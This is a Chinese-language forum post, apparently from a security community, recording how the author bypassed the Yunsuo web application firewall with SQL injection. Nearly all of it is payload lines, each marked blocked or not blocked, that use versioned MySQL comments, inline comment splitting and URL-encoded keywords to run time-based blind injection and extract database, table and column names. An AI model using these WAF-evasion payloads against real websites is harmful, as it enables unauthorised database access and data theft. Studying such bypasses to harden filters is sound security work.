师傅怎么私聊 我有点idea
bypass云锁
我在先知搜了下,发现居然没有bypass云锁的文章,虽然网上有很多bypass云锁文章但是我看了下好像对这篇文章云锁站都gg了,或者云锁已经加强了规则,这里索性就记录下我最近一个bypass云锁.
绕过order by
这里and 没有被拦截就不测试,直接order by肯定不出意外被拦截
/*!order*//*!by*/1 拦截
/*!40000/*!30000order*//*!40000/*!30000by*/1 不拦截 这里30000是数据库版本如果大于他就会执行.
无法绕过union select
这里我花了很多时间来绕union select 发现一直绕不过,如果那位师傅有绕过方法,私聊下....手动打“哭”
转换思路从时间盲注开始
查询数据库
id=2 and length(database())>1 不拦截,这里我们可以判断出数据库长度.
获取数据库名
id= 2 and if(ascii(substr(database(),1,1))>120,1,sleep(7)) 拦截
id=2 and if(ascii(substr(database/**/(),1,1))>120,1,sleep/**/(7)) 不拦截
id=2 and if(ascii(substr(database/*!()*/,1,1))>120,1,sleep/*!(7)*/) 不拦截
使用上面paylaod就能够测出数据库名
查询数据库表
id=2 and if (ascii(substr(select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>96,1,sleep(5)) 拦截
id=2 and if (ascii(substr(select table_name from information_schema.tables where table_schema=database/**/() limit 0,1),1,1))>96,1,sleep/**/(5)) 拦截
id=2 and if (ascii(substr(select table_name from information_schema.tables where table_schema=database/*!()*/ limit 0,1),1,1))>96,1,sleep/*!(5)*/) 拦截这里我就试着把一句句去掉看是哪里被拦截最终发现,是select被拦截,去掉select不拦截,提示语法错误
php
id=2 and if(ascii(substr(( table_name from information_schema.tables where table_schema=database/**/() limit 0,1),1,1))>96,1,sleep/**/(5)) 不拦截
这里来绕select
php
id=2 and if(ascii(substr(( /*!Select*/+table_name from information_schema.tables where table_schema=database/**/() limit 0,1),1,1))>96,1,sleep/**/(5)) 拦截
php
id=2 and if(ascii(substr((/*!40000/*!30000select*/ table_name from information_schema.tables where table_schema=database/**/() limit 0,1),1,1))>96,1,sleep/**/(5)) 拦截
php
id=2 and if(ascii(substr((/*!50000select*/table_name from information_schema.tables where table_schema=database/**/() limit 0,1),1,1))>96,1,sleep/**/(5)) 拦截
php
id=2 and if(ascii(substr((/*!50000%53elect*/table_name from information_schema.tables where table_schema=database/**/() limit 0,1),1,1))>96,1,sleep/**/(5)) 不拦截
这里就可以直接查询出数据库表名
查询字段
直接使上面最后一条就可以绕过
php
id=2 and if(ascii(substr((/*!50000%53elect*/column_name from information_schema.columns where table_schema=database/**/() and table_name='xxxx' limit 0,1),1,1))>96,1,sleep/**/(5)) 不拦截
点击收藏 | 4
关注 | 1
